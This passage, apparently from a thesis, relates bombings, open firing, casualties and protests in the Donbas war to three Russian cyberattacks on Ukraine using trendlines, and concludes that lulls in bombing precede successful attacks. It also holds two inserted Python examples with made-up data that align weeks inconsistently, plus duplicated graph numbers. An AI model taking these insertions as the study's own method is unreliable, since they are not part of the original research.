The second model used to assess trends was a 2-day moving average. The moving average was chosen to see if there was a consistent average gain or loss in relation to the cyberattacks. This analysis, while secondary to the polynomial function, is helpful to even out the trendlines in the case of a random set of data. While a three day, or a four day, moving average would have caused a smoother trendline, the additional manipulation can cause the trendline to appear drastically different than it is in reality, especially when the data does not follow a distinct trend.

Following the analysis of the categories and three major cyberattacks on their own, the weekly data with the polynomial trendline was used to plot failed cyberattacks. While three major cyberattacks are recorded diligently in this project, there have been many other, smaller cyberattacks that are less newsworthy or are lower in overall impact. Adding the failed cyberattacks to the graphs, trends between successful and thwarted cyberattacks can be analyzed.

244 Shifei Ding, Huajuan Huang and Ru Nie, “Forecasting Method of Stock Price Based on Polynomial Smooth Twin Support Vector Regression,” in Intelligent Computing Theories, ed. Huang DS, Bevilacqua V., Figueroa J.C., Premaratne P., Lecture Notes in Computer Science, Vol. 7995 (Springer: , 2013). 245 Donna M. Young, “A Graphic Organizer for Polynomial Functions,” The Mathematics Teacher 106, No. 2 (Sept. 2012); 160-162.

Understanding both can be helpful in determining the consistency of the connection between specific physical attribute and a cyberattack. Unsuccessful attacks are a further method to discern if the stakes of 푇 = 2, identified in the Axelrod-Iliev equation, remains true. Our primarily quantitative approach is undertaken to better understand the conflict. However, even if the data cannot statistically prove correlation between cyberattacks and physical attacks, it can be layered with qualitative analysis to provide a fulsome picture.
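The data preparation steps described above (the 90-day window around an attack date, the prior/post split, the two-day moving average and the weekly compilation) as an added example, not the thesis's own tooling, run over a constructed event list standing in for liveuamap.com records. The alignment of weeks to the attack day is an assumption; the thesis does not state how weeks were bounded.

```python
"""Added example (not code from the thesis): the Chapter 6 data preparation
steps applied to a constructed event list. The real data came from
liveuamap.com; every record below is made up for illustration."""
from collections import Counter
from datetime import date

WINDOW = 90  # days collected before and after each cyberattack (thesis)
CATEGORIES = ("Bombings", "Open Firing",
              "Military Personnel and Policemen Killed or Wounded",
              "Civilians and Politicians Killed or Wounded", "Protests")

NOTPETYA = date(2017, 6, 27)  # disclosure date from Table 2

# Constructed sample records (date, category); not real liveuamap data.
SAMPLE_EVENTS = [
    (date(2017, 6, 24), "Bombings"),
    (date(2017, 6, 24), "Bombings"),
    (date(2017, 6, 25), "Open Firing"),
    (date(2017, 6, 26), "Bombings"),
    (date(2017, 6, 27), "Bombings"),
    (date(2017, 6, 28), "Protests"),
    (date(2017, 6, 29), "Bombings"),
    (date(2017, 3, 1), "Bombings"),   # 118 days before: outside the window
]


def day_offset_counts(events, attack_date, category, window=WINDOW):
    """Daily counts for one category indexed by offset from the attack day:
    element 0 is day -window, element `window` is the attack day itself.
    Events of other categories or outside the window are dropped, as the
    thesis drops data that does not fall within its categories."""
    if category not in CATEGORIES:
        raise ValueError(f"unknown category: {category}")
    counts = Counter()
    for day, cat in events:
        offset = (day - attack_date).days
        if cat == category and -window <= offset <= window:
            counts[offset] += 1
    return [counts[o] for o in range(-window, window + 1)]


def prior_post_split(series, window=WINDOW):
    """The 'prior' (days -window..-1) and 'post' (days 1..window) halves,
    leaving the attack day itself out of both."""
    return series[:window], series[window + 1:]


def moving_average(series, n=2):
    """Trailing n-day moving average (n=2 in the thesis); the first n-1
    points average over the days available so far."""
    out = []
    for i in range(len(series)):
        chunk = series[max(0, i - n + 1):i + 1]
        out.append(sum(chunk) / len(chunk))
    return out


def weekly_totals(series, window=WINDOW):
    """Compile the daily series by week. Assumption (not stated in the
    thesis): weeks are 7-day blocks counted outward from the attack day,
    so week 0 is the attack day plus the six days after it and week -1 is
    the seven days before it."""
    totals = Counter()
    for i, count in enumerate(series):
        offset = i - window
        totals[offset // 7] += count  # floor division puts -1..-7 in week -1
    return dict(sorted(totals.items()))


if __name__ == "__main__":
    daily = day_offset_counts(SAMPLE_EVENTS, NOTPETYA, "Bombings")
    prior, post = prior_post_split(daily)
    print("bombings prior/post:", sum(prior), sum(post))
    print("2-day moving average around the attack:", moving_average(daily)[86:93])
    print("weekly totals:", weekly_totals(daily))
```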

All data tables are included in Appendix A. All charts are included in Appendices B to F.


6.1 Bombings

The first of the five categories used to analyze the physical warfare attributes of the Ukrainian Crisis is Bombing (Appendix B), identified with the following classifications: any reports of artillery being used that is above 86 mm, and any shots fired by weapons classified as anti-aircraft or heavy weapons, including tanks. This also encompasses attacks made by ATGMs, mortars, MLRSs, grenade-specific warfare, GRAD and mine warfare. The bombings must be either deliberate in nature and target Ukrainian military or civilian infrastructure, or a direct result of Russian/LNR/DNR military or separatist initiatives, such as rigging a field with anti-personnel landmines. Bombings that resulted in death or injury to any persons, military or civilian, are counted in the total Bombings as well as in the civilian or military death tolls. Bombings that were in parallel to small arms combat are also counted. For Bombings, as a general rule, the number represents the number of locations hit, not the number of weapons discharged. A lower number does not always correlate with a lower number of bombs detonated, but rather a more concentrated area of fighting. Further, if reporting of a specific structure or specific target as having been destroyed is available, each target is marked as one instance of Bombing, even if more than one bomb was used in the attack.

[Graphs 1-3: day by day Bombings during the three major cyberattacks (figure not reproduced)]

Within the Bombing category, threats and terrorist attacks are also captured. While threats can range from assassination threats to bomb threats and include a wide variety of sins, there is a higher tendency for bomb threats throughout Ukraine than other kinds of threats. In addition, the majority of threats in the data are of an indiscriminate nature, which is defined to be more akin to Bombing than to the other attack categories. Threats are not included as a separate category because of the potential for a threat to be carried out; the overwhelming majority of threats carried out were, in fact, bomb threats. Further, threats have, at a minimum, the intent to cause panic or disturbance, resulting in a government response. The final reason threats are not a single category is the limited data available reporting on threats received. The lack of reliable threat data makes it impossible to identify any trends that can be deemed significant. Terrorist attacks are included in this section as they intend to cause mass panic, similar to threats. In addition, the majority of terrorist attacks do not come to fruition, remaining as threats. The small number of terrorist attacks in Ukraine did not warrant “terrorist attacks” having a separate category.

To better analyze the relationship between physical bombings and each cyberattack, each attack was split into prior and post attack dates. This provided a clearer picture of events around the attack date. The three attacks were overlaid on the same graph to facilitate easier comparison.

Bombings prior to the BlackEnergy3/KillDisk attack were relatively low in number in comparison to the levels around the other two attacks. This may be because it occurred earlier in the war, following the failed Minsk II agreement. While not a single provision of Minsk II had been met by the time of the BlackEnergy3/KillDisk attack, Russia was still claiming negligence and playing a political long game, which dampened the overt use of some types of weaponry.

Prior to the attack, both CrashOverride/Industroyer and NotPetya have a dip in Bombings, while BlackEnergy3/KillDisk has a slight rise in the trendline because of a large number of Bombings three days prior to the cyberattack. However, leading up to the day of the attack, the averages were low for BlackEnergy3/KillDisk, which suggests that the trendline is increasing prior to the attack because of an outlier.

Graph 4. Each point is the total bombings for the week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.


When the attacks were amalgamated by Week, BlackEnergy3/KillDisk followed a similar trend to the other two, where the number of attacks trends down beginning two to three weeks prior to the cyberattack. While the pattern around NotPetya occurs at a slightly different time than for the other two attacks, this is likely due to the School Year Ceasefire agreement, agreed upon on the 26th of August, 60 days following the attack.

BlackEnergy3/KillDisk, CrashOverride/Industroyer and NotPetya all have trendlines that suggest Bombings are likely to wane leading up to a cyberattack. Both BlackEnergy3/KillDisk and CrashOverride/Industroyer climb following the attack, although not linearly, further suggesting that Bombings will again rise following a cyberattack and that any lull in fighting surrounding a cyberattack is unlikely to continue. Leading up to and directly following the NotPetya attack, the School Year Ceasefire was negotiated and then brought into action on the 60th day following the attack, the middle of Week 22.

Ukraine has suffered many cyberattacks of varying nature, but many were not successful. It is possible to plot these on the weekly attack graph, which places every failed cyber attempt, except one that is not confirmed, above the Bombing trendline. If Russia continues to attack when the physical stakes are lower, or when a pivot of focus away from the crisis lowers the physical stakes, this would imply that more attacks are thwarted when the number of physical attacks is higher. Graph 5 overlays thwarted cyberattacks on this data to show where they fall along the trendline.

Graph 5: Cyberattacks and suspected cyberattacks that were thwarted prior to damaging Ukrainian systems.

As physical warfare on the ground increases, the Ukrainian government is more likely to be focusing on impeding attacks than when there is a calm in the fighting, during which international obligations may have higher importance. As shown in Chapter 5, an attack is most likely to be successful when it is carried out at a time of lower stakes – when there are fewer Ukrainian and Western eyes focused on the cyber aspect of the Crisis. BlackEnergy3/KillDisk, CrashOverride/Industroyer and NotPetya all occurred as successful attacks during a period when bombings were trending downward.

The data collected under the Bombing category shows a pattern between the number of bombings occurring and when a cyberattack takes place. In future research this correlation should be examined more carefully. Further analysis should use the OSCE data gathered to track heavy artillery exchanges. Ukrainian bombing should also be examined to see whether there are any identifiable trends between the rate of Ukrainian attacks against Russian/LNR/DNR positions and the use of cyberattacks against Ukrainian infrastructure. Future research should rely on multiple collection sites from different actors in the war, including Russian figures, Ukrainian figures, OSCE figures and LNR/DNR figures.


6.2 Open Firing

The second category of information collected is data on open firing instances (Appendix C). This category is perhaps more straightforward than bombing, as any attack that used weapons not designated as heavy weaponry, nor mentioned under the data collected in Bombings, falls under Open Firing. Open firing must have been from a Russian/LNR/DNR military or separatist group against a Ukrainian group. This distinction is difficult to confirm in some cases, but the use of liveuamap.com assisted in this distinction because it had links to the social media of sympathizers with either the Ukrainian cause or the Russian/LNR/DNR cause. From this, it was more often possible to determine which side perpetrated which violence. Although reports on social networking sites can often be propaganda, caution was taken to monitor both pro-Ukrainian propaganda and pro-separatist propaganda.

Graphs 6-8: These graphs indicate the day by day Open Firing instances across all 3 attack periods.

Open firing also includes any gun-related attacks on military police or civilian infrastructure outside of Donbas. Any attack that targets persons or infrastructure with a gun, such as the assassination or murder of a policeman, is included in this category. Open firings that result in deaths are included in this category, while each individual death is included under the Killed or Wounded Persons category. Any act that includes an attack with a weapon for the purpose of supporting Russia/LNR/DNR is considered an instance of open firing. If there is an attack where the motive cannot be determined, the attack is not included.

To better analyze the relationship of open firing to each cyberattack, each attack was split into prior- and post-attack dates. This provides a clearer picture around the attack date. The three attacks were overlaid on the same graph to facilitate easier comparison. The open firing data shows a starkly different picture from the Bombing data. Prior to the BlackEnergy3/KillDisk and CrashOverride/Industroyer attacks there was a significant increase in the number of attacks, followed by a drastic downturn immediately after the cyberattacks. Figures 7 and 8 show the day by day values, which indicate a clearly discernible spike in open firing leading up to the attack, with a downturn in open firing instances directly after the attack. The NotPetya attack happens in a downturn of Open Firing, but this downturn can be attributed to the negotiations happening around the School Year Ceasefire agreements. Given the calculation of T = 2 from the Axelrod-Iliev model (see Chapter 5), this downturn would make the occurrence of NotPetya consistent with the earlier findings.

Graph 9: Open Firing instances beginning 91 days prior to each cyberattack.

Graph 10: Open Firing instances 90 days following each cyberattack.


Evaluating the Open Firing data by Week helps clarify the overall timeline of each attack as well. Whereas in the daily data the trendline shows a large drop in both the BE3/KillDisk data and the CrashOverride/Industroyer data, this dip is an anomaly within one Week in the BE3/KillDisk data. The polynomial function does not clearly identify these attacks as a dip in the trendline, unlike the data when analyzed by day. Both granularities show Open Firing spiking around the time of the cyberattack. The exception again is NotPetya, which is influenced by the School Year Ceasefire agreement. NotPetya follows the same general trend as in Bombings, where a decrease in instances begins around Week 9.

Graph 11: Open firing by week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.


Recall that there are multiple cyberattacks on Ukrainian infrastructure that were thwarted prior to successful disruption of Ukrainian systems. These attacks have been overlaid with Graph 11 to determine if the attacks occurred at a time of high stakes, when there would have been more attention on the Ukrainian Crisis and cyberattacks. Graph 12 is used to further investigate the relationship of cyber and physical attacks in the Ukrainian Crisis.

Graph 12: Cyberattacks and suspected cyberattacks that were thwarted prior to damaging Ukrainian systems.

By analyzing Graph 12 it is obvious that the majority of thwarted attacks fall below or along the trendlines. This is in direct contrast with the data analyzed in the Bombings section, where all but one suspected attack was above the general trendline. In Open Firing the opposite is true, where all, except one, are below the trendline, with another appearing on the line. Open Firing and cyberattacks appear to have little correlation with one another.

One reason for the different findings within this category is potentially related to the number of bombings decreasing at the time of cyberattack. If the number of bombings reduces at the same time that the number of Open Firing instances rises, it is possible that the Russian side is unlikely to use as much heavy artillery when it is using more soldiers. This could be indicative of a lower number of Bombings but a larger number of small arms combats around the time of cyberattacks. More research would have to be undertaken before making a definitive statement about the relationship between these two data sets.
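The weekly aggregation and trendline reading used throughout Sections 6.1 and 6.2 (7-day bins with the cyberattack at the end of week 13, a fitted polynomial trendline, thwarted attacks placed above or below that line) can be reproduced on any daily count series. The following is an added example and not code from the thesis: its daily counts are constructed, the least-squares fit solved through the normal equations is an assumption about how the trendlines were produced (the chapter only names a polynomial function), and the half-count tolerance for a point lying "on" the line is likewise an assumption.

```python
"""Weekly trendline analysis of physical-attack counts around a cyberattack.

Added worked example, not code from the thesis.  Daily counts are bucketed
into 7-day weeks with the attack at the end of week 13, a least-squares
polynomial trendline is fitted to a window of weeks, and a (week, count)
point such as a thwarted cyberattack is classified against that line.
All daily counts below are CONSTRUCTED sample data.
"""

WEEK = 7
ATTACK_WEEK = 13  # the cyberattack falls on the last day of week 13


def weekly_totals(daily):
    """Sum daily counts into consecutive 7-day weeks.

    daily[0] is 90 days before the attack and daily[90] is the attack day, so
    weeks 1..13 cover the 91-day pre-attack window and later entries form the
    post-attack weeks.  A trailing partial week is kept, not dropped.
    """
    return [sum(daily[i:i + WEEK]) for i in range(0, len(daily), WEEK)]


def polyfit(xs, ys, degree):
    """Least-squares polynomial coefficients, lowest degree first.

    Solves the normal equations by Gaussian elimination with partial
    pivoting, so nothing outside the standard library is needed.
    """
    n = degree + 1
    a = [[float(sum(x ** (i + j) for x in xs)) for j in range(n)] for i in range(n)]
    b = [float(sum(y * x ** i for x, y in zip(xs, ys))) for i in range(n)]
    for col in range(n):
        pivot = max(range(col, n), key=lambda r: abs(a[r][col]))
        a[col], a[pivot] = a[pivot], a[col]
        b[col], b[pivot] = b[pivot], b[col]
        for r in range(col + 1, n):
            factor = a[r][col] / a[col][col]
            for c in range(col, n):
                a[r][c] -= factor * a[col][c]
            b[r] -= factor * b[col]
    coef = [0.0] * n
    for i in range(n - 1, -1, -1):  # back substitution
        residual = b[i] - sum(a[i][j] * coef[j] for j in range(i + 1, n))
        coef[i] = residual / a[i][i]
    return coef


def evaluate(coef, x):
    """Value of the fitted polynomial at x."""
    return sum(c * x ** i for i, c in enumerate(coef))


def trend(weekly, first_week, last_week, degree=1):
    """Fit a trendline to weeks first_week..last_week (1-based, inclusive).

    Returns (coefficients, direction).  Direction is the fitted curve's value
    at the last week minus its value at the first week, which also reads
    correctly for polynomial degrees above 1.
    """
    xs = list(range(first_week, last_week + 1))
    ys = weekly[first_week - 1:last_week]
    coef = polyfit(xs, ys, degree)
    delta = evaluate(coef, last_week) - evaluate(coef, first_week)
    if abs(delta) < 1e-9:
        direction = "flat"
    elif delta < 0:
        direction = "waning"
    else:
        direction = "rising"
    return coef, direction


def relative_to_trendline(coef, week, count, tolerance=0.5):
    """Classify a point as 'above', 'on' or 'below' the fitted trendline.

    The tolerance for 'on' is an assumption of this example; the thesis reads
    the position off the chart by eye.
    """
    diff = count - evaluate(coef, week)
    if abs(diff) <= tolerance:
        return "on"
    return "above" if diff > 0 else "below"


# CONSTRUCTED daily Bombing counts: 13 pre-attack weeks of waning fire,
# 12 post-attack weeks in which it climbs again, plus a 6-day partial week.
SAMPLE_DAILY = (
    [20 - w for w in range(1, 14) for _ in range(WEEK)]
    + [6 + w for w in range(1, 13) for _ in range(WEEK)]
    + [18] * 6
)

# CONSTRUCTED thwarted-attack points as (week, Bombings that week).
SAMPLE_THWARTED = [(10, 84), (10, 70), (5, 90)]


if __name__ == "__main__":
    weekly = weekly_totals(SAMPLE_DAILY)
    pre_coef, pre_dir = trend(weekly, 1, ATTACK_WEEK)
    _, post_dir = trend(weekly, ATTACK_WEEK + 1, len(weekly) - 1)
    print(f"pre-attack trend: {pre_dir}, post-attack trend: {post_dir}")
    for week, count in SAMPLE_THWARTED:
        where = relative_to_trendline(pre_coef, week, count)
        print(f"week {week}: {count} bombings -> {where} the trendline")
```

Run stand-alone, the script prints the pre- and post-attack directions and the position of each sample thwarted-attack point. Because trend reads direction from the fitted curve's endpoints, the same call with degree=2 mirrors the polynomial trendlines the chapter discusses; with noisy daily data it is worth comparing both granularities, as Section 6.2 does, since a single-week anomaly can flip the daily-level reading.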


6.3 Military Personnel and Policemen Killed or Wounded

The third category analyzed is the data on Military Personnel and Policemen either killed or wounded (Appendix D). This includes all police forces across Ukraine, Ukrainian military units fighting in Donbas, volunteer military troops fighting in Donbas and national guardsmen. Police are an important inclusion, as an attack directly against police following the induction of the new police force, beginning in the summer of 2015, was often due to direct displeasure stemming from Western involvement in police reform and training. Any incidents surrounding police had to have a direct link to anti-Ukrainian, anti-Western, anti-EU, pro-Russian or pro-separatist motives. If a shooting involving police occurred, news articles and other media, including YouTube video, video from media providers, and eyewitness social media, would be used to determine the motivating factor. With the addition of national guardsmen, policemen and volunteer soldiers, the numbers may vary from other sources. Any persons that had been wounded and later died of their wounds are only counted as a single instance, recorded on the day of wounding.

Graphs 13-15: These graphs indicate the day by day Military Personnel and Policemen Killed or Wounded across all 3 attack periods.

This data set had lower overall numbers than the first two categories and fluctuated significantly between days when there would be no reports and days when mass casualties would be reported. For these reasons, this data is less reliable than the first two categories, but general assumptions can still be made from this data group. Tracking wounded and killed military personnel and policemen was difficult due to the lack of coherent reporting and the large number of volunteer troops used during the BE3/KillDisk timeline. As data reporting from the Crisis becomes more standard, the numbers become more accurate, but many volunteer forces still operate outside of the reporting structure, and non-life-threatening wounds may not be fully reported.

First, considering the weekly data, which generally shows trends more clearly and succinctly, it is obvious that an outlier in the CrashOverride/Industroyer data set is causing a large spike in the trendline that does not take into account the outliers of Week 14 and Week 20.

Noticeably, the trendlines for both BE3/KillDisk and NotPetya are trending downwards over the time each respective cyberattack took place. Although CrashOverride is the most abnormal trendline among the three, all three cyberattacks occurred after a Week of relative calm in terms of military personnel or policemen deaths and woundings. In the Open Firing data set, Week 14 had 421 incidents compared to 332 and 274, respectively, for the two following Weeks. While Week 13 had 425 instances of Open Firing, the day of the attack was the beginning of the increase with 126 occurrences, while the four days prior had 52, 17, 18 and 15, respectively. The spike in Week 14 includes all attacks post cyberattack. This increase in deaths and woundings is consistent with both the increase in Open Firing instances and the increase in Bombings post cyberattack.

The day to day data is shown in Graphs 16 and 17. There is an obvious large spike in Deaths or Woundings beginning on the day of the cyberattack and continuing for about a Week following the cyberattack.

Graph 16: Military Personnel and Policemen Killed or Wounded 91 days prior to the cyberattack.

Graph 17: Military Personnel and Policemen Killed or Wounded 9 days post cyberattack.

It appears that spikes are not uncommon in the data set. This could be due to aggressive offensives during these times, a clash between police forces and anti-Ukraine groups leading to a spike in the less frequent category of policemen deaths, or inaccurate reporting of killed and wounded soldiers from the frontline due to political restraints, communication problems, misinformation or misinterpretation. Unfortunately, the data set is largely unreliable, and conclusions drawn from it are likely faulty. Further investigation using the Deaths and Woundings data category would need to be focused on its intersection with Bombings and Open Firings as well as with cyberattacks. The data could be used to determine whether there is a spike aligning with Bombings or Open Firings, whether the spikes in Deaths and Woundings are clustered around a different phenomenon, such as a cyberattack or international political disruption, or whether they are random.

Graph 18: Military Personnel and Policemen Killed or Wounded by week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.


6.4 Civilians and Politicians Killed or Wounded

The fourth category analyzed is the data on Civilians and Politicians Killed or Wounded (Appendix E). This includes civilians living in Donbas, in war zones or along the front lines, or any persons killed due to an attack that had a direct link to anti-Ukrainian, anti-Western, anti-EU, pro-Russian or pro-separatist motives. Donbas veterans killed following return from deployment or during retirement were considered civilians when collecting the data. Since veterans were no longer in an active war zone, nor did they have active participation in the war, they were no longer considered soldiers and were obviously not killed under the same circumstances. If a retired military veteran reentered the War in Donbas by volunteering for a battalion outside of the official Ukrainian military, those statistics would be counted under the aforementioned group, Military Personnel and Policemen Killed or Wounded, because they were directly involved in the war at the time of death.

Graphs 19-21: These graphs indicate the day by day Civilians and Politicians Killed or Wounded across all 3 attack periods.

Politicians were included with civilians because, despite the pointed nature of the assassination of a politician and how drastically different it is from the often accidental killing of civilians in a war zone, they are considered civilians in the majority of countries. Politicians who were attacked by unknown assailants were assessed as attacked due to the divisions created by the war if the politician was pro-Ukrainian independence, pro-Western, anti-Russia or anti-separatist. If an attack on a generally pro-Russian politician occurred by unknown assailants, further research was conducted to determine whether any important vote had occurred prior to the attack, and an assessment was undertaken of their position on the topic. If no such data could be found, or if the data suggested the politician was continuously pro-Russian, pro-separatist, anti-Ukrainian independence or anti-Western, the attack was assessed as a pro-Ukrainian independence attack and therefore not counted. If the information found suggested a recent pivot away from historical tendencies, then the attack was assessed as coming from a pro-Russian group and was therefore counted in the data.

This data set is smaller than the previous categories in terms of average number per day. While assassinations of politicians are newsworthy and heavily reported, including attacker motive, there is a lack of coherent reporting on deaths within the combat zone in eastern Ukraine. Civilian deaths, while captured by OSCE data, are still sporadic and are likely to be reported on the wrong day or missed altogether. The data collected from liveuamap.com included the OSCE data and volunteer data but gives few indications that the deaths or injuries are reported on the correct day. Further, any attempts against politicians may be covered up for political reasons, making the wounding of a politician an unlikely category to be captured through open source data.

Graph 22 shows the number of civilians and politicians killed by Week. The number of deaths is trending down for all three attacks, although the data is insufficient to make legitimate claims about the relationship of civilians and politicians killed or wounded to cyber attacks.

Graph 22: Civilians and Politicians Killed or Wounded by week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.

The number of Civilians and Politicians Killed or Wounded is low around the attack date, both before and after the attack, despite a higher number of open firing instances and a lower number of bombings. This is also the inverse of what was observed in the data set of Military Personnel and Policemen Killed or Wounded, where the number of instances spiked starting the day of the cyberattack and lasted into the immediate future. All three cyberattacks occurred during a downturn in instances. This would likely indicate that the crisis is in a downturn, which is known to be false in terms of open firing but true in terms of Bombings. The downturn in civilian and politician deaths and woundings can be traced to a number of factors, all with unknown correlations, causations and relevance.

The downturn in deaths and woundings again could be attributed to the downturn in bombings, which are more indiscriminate in nature than Open Firing, especially in towns along the border. This data set is also unreliable, so conclusions drawn from it are likely to be faulty. Further investigation focused on the intersection of Bombings, Open Firings and the Deaths or Woundings to attack ratio would be interesting. That data could then be used to determine whether there is a spike in deaths aligning with physical attacks, or whether the ratio suggests that the deaths are clustered around a different phenomenon, such as a cyberattack or international political disruption.


6.5 Protests

The final category of data collected was concerned with the number of protests (Appendix F) throughout Ukraine and Donbas. This data set includes only protests that fell into the following categories: anti-EU, anti-Western, anti-Ukrainian or anti-Ukrainian Independence, anti-Poroshenko, anti-United States, anti-foreign aid, pro-DNR, pro-LNR, pro-Russian, pro-Communist, or a protest celebrating Soviet holidays or dates that had been discontinued in Ukraine after the fall of the Soviet Union. Some protests that were created and promoted by anti-Russian and anti-Western ultra-right-wing groups fell within the categories. Thus, some right-wing protests against the government were counted that were not strictly Russian/LNR/DNR groups. The decision to add these was made due to their disruption to the government, the police resources needed to stop them from resorting to violence and their violent forms of protest, which continued to assist in Ukrainian destabilization.

Graphs 19-21: These graphs indicate the day by day Protests across all 3 attack periods.

Protests were included as a way to determine if they spiked or waned near a cyberattack.

Due to the large number of protests known to have occurred during the summer of 2015, protests were added as the final category, but the data points are so infrequent that tracking them has near zero confidence.246 This category is most likely to be flawed due to lack of information.

Liveuamap.com, while a social media repository, is likely to miss protests, especially those that are planned offline or in secret, are impromptu, do not involve violence, or have no overt, publicly announced political agenda.

Graph 22: Protests by week. Each week is comprised of 7 days, with the cyberattack occurring at the end of week 13.

246 Protests during the summer of 2015 were not included in this project as they were outside of its scope. The number of protests over the summer of 2015 is based on data amalgamated by the United States State Department and on the author's work in Ukraine during the summer of 2015.

Graph 22 shows the protests by Week. Despite the decline in instances of protests around the cyberattacks, linking Protests and the occurrence of cyberattacks would be a mathematical and logical fallacy. Many protests in Ukraine have happened over the years of the Ukrainian Crisis, the majority of which can be traced to specific events happening in politics or within the Combat Zone. For instance, under the BE3/KillDisk data, the five protests in Week 7 are due to elections, the two protests under Week 11 are in direct retaliation to the anniversary of the Maidan Revolution, and several of the others are due to Russian and/or Soviet holidays. Under CrashOverride/Industroyer, the four protests under Week 23 are due to messages being sent to Ukrainian citizens and servicemen to defect and join Russia and a loss of confidence in the Poroshenko government. Under NotPetya, the ten protests in Week 7 were all on May 9th, the Soviet/Russian holiday named Victory Day, in remembrance of winning the Great Patriotic War (World War II). The seven protests in Week 24 were all calling for the former Georgian President, and former Mayor of Odesa, to have his Ukrainian citizenship reinstated, and protests at the border eventually led to him being dragged across the checkpoint by a mob.


7 Conclusion

This thesis aims to understand the interplay of cyber and traditional warfare tactics employed in hybrid warfare by asking the following question: What relationship exists between cyber attributes and physical attributes in hybrid warfare, and can the interplay of cyber and physical attributes assist disadvantaged states in predicting cyberattacks? Based on the research in this thesis, cyber and physical attributes show a pattern between the number of Bombings occurring and when a cyberattack takes place. This, coupled with the knowledge gained from the Axelrod-Iliev equation calculations, can assist smaller states in making educated inferences and allocating resources to best protect systems. While this thesis focused on Ukraine and the Ukrainian-Russian relationship, similar analysis is possible on other hybrid wars between two unbalanced states.

With cyber a growing concern for states and for the international community, definitions and power struggles hamper forward movement in collaboration and cooperation. The lack of definitions is important in the cyber domain, as it allows the use of the Internet as a military tool with few legal repercussions. Clear distinctions were made, based on previous academic work and state governmental documents, between cyberattack, information warfare, cyber espionage, cyber warfare, cybercrime and hybrid warfare. Definitions remain firmly in domestic legislation and are lacking throughout international legislation. As a result, it is evident that each definition is specifically made to fit the needs of the state. It is through legislation and definitions that states allow themselves to partake in cyberattacks, and it is through legislation and definitions that states protect themselves from the international repercussions of utilizing a cyberattack.

Larger states that hold greater power can more readily control the cyber domain and influence future advancements in, and legislation about, cyber. Thus, smaller states are at a disadvantage when in contention with a larger state. This power in cyber comes from infrastructure, legislation and funding around cyber and the advancement of new cyber technologies. A comparison between United States, Russian and Ukrainian power surrounding cyber infrastructure, legislation and funding is presented to further convey the need for alternative approaches to hybrid warfare. A smaller state is unable to compete with larger states that vie for dominance in this domain. By understanding the relationship between physical attributes and cyber attributes in hybrid warfare, the gap between larger and smaller states in infrastructure, legislation and funding can be minimized.

Ukraine is used as the case study to analyze the interplay of cyber attributes and physical attributes in hybrid war. The tumultuous Ukrainian-Russian relationship before, during and after the Maidan Revolution, the annexation of Crimea and the War in Donbas all lend themselves well to analyzing hybrid warfare within an ongoing conflict that has both a strong cyber and a strong physical aspect. Another key aspect of the case study was the aggressive relationship between a larger state, powerful in cyber technology and infrastructure, able to vie for its own interests on the international stage, and rich in resources, including money, and a smaller state, weak in cyber technology and infrastructure, largely absent from the international stage, poor in resources, and lacking funds for cyber development. Russia and Ukraine fit the dichotomy of a larger adversary state and a smaller victim state.

Russian influence in Ukraine is historical, as the two have been similar culturally, socially and linguistically. This has led the larger state, Russia, to assume a continued partnership based on past alliances and interactions. Historic and linguistic similarities cause Russia to view Ukraine as a beneficiary of Russian power, a sphere of influence that Russia identifies as historical Russian land. This Russian focus on Ukraine has meant that Russian influence over Ukraine did not dissipate after the collapse of the Soviet Union. While it is evident that Ukraine aimed to join the West in alliance, rather than Russia, Russian influence in the media, schooling, language and ideology is deeply rooted within Ukrainian society.

Five attacks were chosen for analysis due to their devastating nature and the role they played in Russia gaining advantage over Ukraine militarily, socially and structurally: Operation Armageddon, X-Agent, BE3/KillDisk, CrashOverride/Industroyer and NotPetya. These five attacks were used to operationalize the Axelrod-Iliev equation. The equation was used to determine the optimal timing of a cyberattack using the specific attributes of the Ukrainian Crisis. Calculating T = 2 to be true informs us that the optimal timing is during a lull in the risk of using the cyberattack.

If the Ukrainian government is aware that there is a higher likelihood of attack during a diversion of focus away from the Ukrainian Crisis, the government can be more prepared for increased activity. If there is a time the Ukrainian government will feel less vulnerable for any number of reasons, such as installing new defensive software, transitioning away from Soviet built infrastructure, a decline in fighting or a ceasefire negotiation, the government should, in turn, be on heightened alert for cyberattack. A cyberattack is still able to occur at any time in the Crisis but the most likely time a cyberattack will breach Ukrainian systems is during this downturn.

The assumption that a downturn in fighting or a ceasefire directly parallels a decline in the use of cyberattacks is false. Cyberattacks employed during this lull are more likely to be successful, and Ukraine’s defense against cyberattacks should be on heightened alert while the fighting is quieter.

Statistical analysis of the data was done to discern the relationship between the timing of a cyberattack and the physical attributes on the ground. While the Axelrod-Iliev equation takes into account physical attributes, it is impossible to pinpoint a specific physical attribute and its relationship with a cyberattack. For this reason, five data categories were chosen: Bombing, Open Firing, Soldiers and Policemen Killed or Wounded, Civilians and Politicians Killed or Wounded, and Protests. It would be pleasing to conclude that there was a definitive correlation between a specific physical attribute and cyberattack, but this is not the case.

The relationship between Bombings and cyberattack and Open Firing and cyberattack were the most clearly defined. While no patterns are perfect correlations, the interplay of Bombings around each of the cyberattacks is a discernable pattern. This pattern suggests future research.

Bombing analysis should be conducted to include a more focused set of data, only incorporating bombings. While it is not a direct, provable correlation, further research could yet prove a stronger connection between the two. Open Firing and cyberattacks have a less definable trend than Bombings. However, despite this, Open Firing has potential for future research regarding the interplay of Bombings, Open Firing and cyberattacks. A more pointed study would need to be completed before any specific connections can be made, although Open Firing does rise slightly around the time of cyberattack.

The Ukrainian government should be aware that a lull in bombings is when there is a higher chance of a cyberattack being successful. Assuming T = 2, this makes logical sense, as there is a lull in the fighting, a feeling of confidence from the Ukrainian government, and a relaxing of defensive postures. However, should a downturn in bombings happen, cyber defenses should not assume that things are quiet on all fronts. It is during this time that it is optimal to use a cyberattack, meaning it is during this time that Ukrainian cyber defenses should be on high alert.

The other three categories lacked data or had spikes with little connection with other trends.

Trends in Military Personnel and Policemen Killed or Wounded and Civilians and Politicians Killed or Wounded were difficult to gain insight from, as the data sets were low in quantity and conclusions are likely to be misleading or faulty. Spikes in deaths across both data sets suggest that deaths have a stronger connection to something other than cyberattacks. Protests were the least useful category. The data collected was sporadic, and protests could easily be attributed to specific phenomena entirely unrelated to cyberattacks. Further research about the correlation of protests and cyberattacks would be highly unlikely to produce any useful conclusions.

